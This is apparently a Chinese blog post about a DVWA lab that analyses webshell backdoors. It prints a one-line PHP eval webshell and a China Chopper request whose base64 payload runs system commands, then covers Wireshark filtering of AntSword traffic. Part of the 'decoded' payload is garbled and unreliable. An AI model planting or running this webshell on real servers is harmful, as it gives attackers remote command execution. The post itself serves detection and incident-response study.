Webshell后门分析

最新推荐文章于 2024-08-26 13:19:33 发布
最新推荐文章于 2024-08-26 13:19:33 发布
阅读量761 收藏
点赞数 2
分类专栏: 网络安全 文章标签: 安全 web安全 网络安全 网络攻击模型 服务器 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Williamanddog/article/details/128903074
版权

    • 代码层面后门分析

通过文件上传漏洞上传webshell

访问webshell地址: http://192.168.1.157/DVWA/DVWA/hackable/uploads/post.php

可以通过post传参来执行命令,a=system("whoami");

为什么可以通过post传参来执行系统命令呢? 分析一句话webshell的代码:

<?php @eval($_POST[a])?>

<?php ?>是php语言的格式,eval将括号内的字符串解析为php代码。 $_POST[test]为获取post参数test的值 @是抑制符号,屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的 出错信息 该一句话木马的意思是:在post参数中test后面的值都会当作php的代码来执行 当我们传入system("whoami"),会当作php代码直接执行,system是php的命令执行函数,所以直接 执行了whoami命令,显示出来

2.菜刀后门分析

中国菜刀:一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都 可以用中国菜刀来进行管理。 Winsock expert:能够调试网络应用程序,分析网络程序的通信协议(如分析OICQ的发送接收数 据),并且在必要的时候能够修改和发送的数据。

打开菜刀链接webshell

打开WSExplorer

进入菜刀界面操作,WSExplorer会捕获到数据包

正常来说地址都是192.168.1.157,如果出现了可疑的其他服务器地址,就很有可能存在后门

分析数据包:

POST /DVWA/DVWA/hackable/uploads/post.php HTTP/1.1

X-Forwarded-For: 96.120.19.174

Referer: http://192.168.1.157

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Host: 192.168.1.157

Content-Length: 659

Connection: Close

Cache-Control: no-cache

a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5X3Byb1xXV1dcRFZXQVxEVldBXGhhY2thYmxlXHVwbG9hZHNcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

对z0的值进行base64解码得到明文:

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(Ii0%ØÂ"“³²GÖ&6ScEöFV6öFR‚Eõõ5E²'£%ғ²G3Ö&6ScEöFV6öFR‚Eõõ5E²'£"%ғ²FCÖF—&æÖR‚Eõ4U%dU%²%45$•Eôd”ÄTäÔR%ғ²F3×7V'7G"‚FBÃÓÓÒ"ò#ò"Ö2Â'²G7ÕÂ"#¢"ö2Â'²G7ÕÂ"#²G#Ò'²GÒ²F7Ò#´7—7FV҂G"â"#âc"ÂG&WB“·&–çB‚G&WBӓò §&WCײG&WGТ#¢"#³¶V6†ò‚'ÃÂÒ"“¶F–R‚“s%3D&z1=cmd&z2=cd /d "C:\phpstudy_pro\WWW\DVWA\DVWA\hackable\uploads\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [EXQ%3D%3D

发现 z1=cmd z2=cd /d "C:\phpstudy_pro\WWW\DVWA\DVWA\hackable\uploads\"&netstat -an | find "ESTABLISHED" 该语句意思为进入C:\phpStudy\PHPTutorial\WWW\DVWA\hackable\uploads目录执行cmd命令 netstat -an | find "ESTABLISHED"查看处于established状态的接口,并且输出。这就是中国菜刀的流量通信的特征。

针对交互的流量包进行逐个分析,如果在这些特征中出现了可疑的IP地址或者服务器地址,就很有可能 存在后门

3.网络层面后门分析

打开Wireshark,选择VMware net8网卡,进行数据包捕获:

使用上传漏洞获取Webshell,并利用蚁剑继续连接,执行命令

通过语法过滤进行分析: ip.dst == 192.168.1.157 && http --> 查询目的IP是192.168.1.157并且协议是http的流量包

右击数据包,追踪TCP流,即可发现蚁剑执行命令的流量包

对其进行URL解码

对其进行分析,发现cmdrun和passthru等可能存在攻击威胁的特征

梓桐sama
关注
专栏目录
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 4208
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
网站漏洞测试 关于webshell木马后门检测
网站安全资讯
11-07 872
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,I...
Wireshark 分析常见 Web 攻击的流量特征
weixin_51559599的博客
12-08 5971
攻击者在输入字段中插入恶意的 SQL 语句,实现对数据库的增删改查。可以在 http 请求中通过查找 SQL 注入语句中的 union、select、sleep 等关键字来判断 SQL 注入的流量dvwa SQL Injection low 为例poc筛选目的 ip 为靶场服务器并且为 http 的流量找到 SQL 请求的 http 报文可以看到unionselectdatabase等 SQL 注入的关键字解码后即可看到原始 poc。
网络安全入门必选:十款免费的抓包工具有哪些?
最新发布
QIANDXX的博客
08-26 2550
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
一次对webshell后门的查看
dfdhxb995397的博客
01-18 474
本文作者i春秋作家——非主流 昨天晚上突发奇想的想去看看github上面tennc的webshell收集项目中的shell有没有漏洞,比如未授权啊啥的,结果找半天都没找到。。。但是机缘巧合下,居然给我找到了一个后门狗。 存在后门webshell地址 follow me 我们咋一看这不就是jspspy嘛 年轻人不要急我们先把整个项目download下来然后再好...
webshell相关之——webshell后门分析
温柔小薛的博客
04-29 1684
webshell后门分析 什么是WebShell 顾名思义,“web”的含义是需要服务器开放web服务;“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 很多时候我们下载很多别人的webshell,我们要去判断这个websh...
php webshell 分析,一款奇葩的PHP Webshell后门分析
weixin_39939661的博客
03-22 357
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:error_reporting(0);session_start();header("Content-type:text/html;charset...
应急响应-主机后门webshell的排查思路(webshell,启动项,隐藏账户,映像劫持,rootkit后门
告白的博客
08-04 1691
思路3:pchunter查看进程,大多数木马文件在没有做屏蔽等措施,在厂商归属,指纹信息会显示异常,或者无任何厂商归属信息,可以借助为参考。针对主机后门windows,linux,在对方植入webshell后,需要立即响应,排查出后门位置,以及排查对外连接,端口使用情况等等。借助工具:pchunter 火绒剑 均可,不方便情况下cmd查看对外连接状态,进程状态,端口信息等。linux被rootkit上线:无法查看到对外连接,在受害机执行命令可以做到隐藏进程,文件等。映像劫持,隐藏账户,均可借助工具查看,
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
Webshell安全分析实践谈
01-28
Webshell安全网络安全领域中的一个重要议题,通常指的是攻击者通过网站后门控制服务器的权限。这篇文档提供了Webshell安全分析的实践方法,包括安全处理的线索挖掘、处置和溯源过程。以下是根据给定文件内容提炼出...
PHP后门新玩法:一款猥琐的PHP后门分析
03-04
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
.net web shell后门(源码)
05-03
这事自己制作的一个.net webshell 通过.net 提权进行服务器注入用的 做出来给大家用 。 若不明白 可以联系我 里面有aspx和源码 。 欢迎下载 ,
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
WebShell后门检测与WebShell箱子反杀
永远是少年
10-28 1059
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀。 一、WebShell后门检测 二、WebShell后门原理 三、WebShell箱子反杀
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门
BUUCTF webshell后门
Bnessy
03-25 546
下载附件,是网站源代码,题目说有webshell,那直接拿D盾扫 查看扫出来的后门文件,找到flag
JavaWeb后门(webshell)基础
st3pby的博客
12-25 2215
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
Webshell流量分析
qq_56414082的博客
11-29 632
Webshell看起来和普通的服务端脚本一样,看起来就像普通的代码。Webshell对本地资源具备一定的操作能力,其操作本地资源的范围取决于解析器的权限。?# 利用方式cmd=ls?# 利用方式?# 利用方式# 上传shell.jpg到同一目录,其中包含代码
后门分析思路
weixin_34197488的博客
11-05 648
什么是后门程序 后门程序又称特洛伊***,其用途在于潜伏在电脑中,从事搜集信息或便于***进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。 后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。 后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败...
Python开发WebShell检测工具教程与实践
它能够帮助用户扫描并检测可能存在的webshell后门,从而提升网站的安全性。工具通过命令行参数提供灵活的使用方式,同时适用于不同的用户群体,包括学生和安全研究人员。掌握这类工具的使用和开发,不仅能够加强个人...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值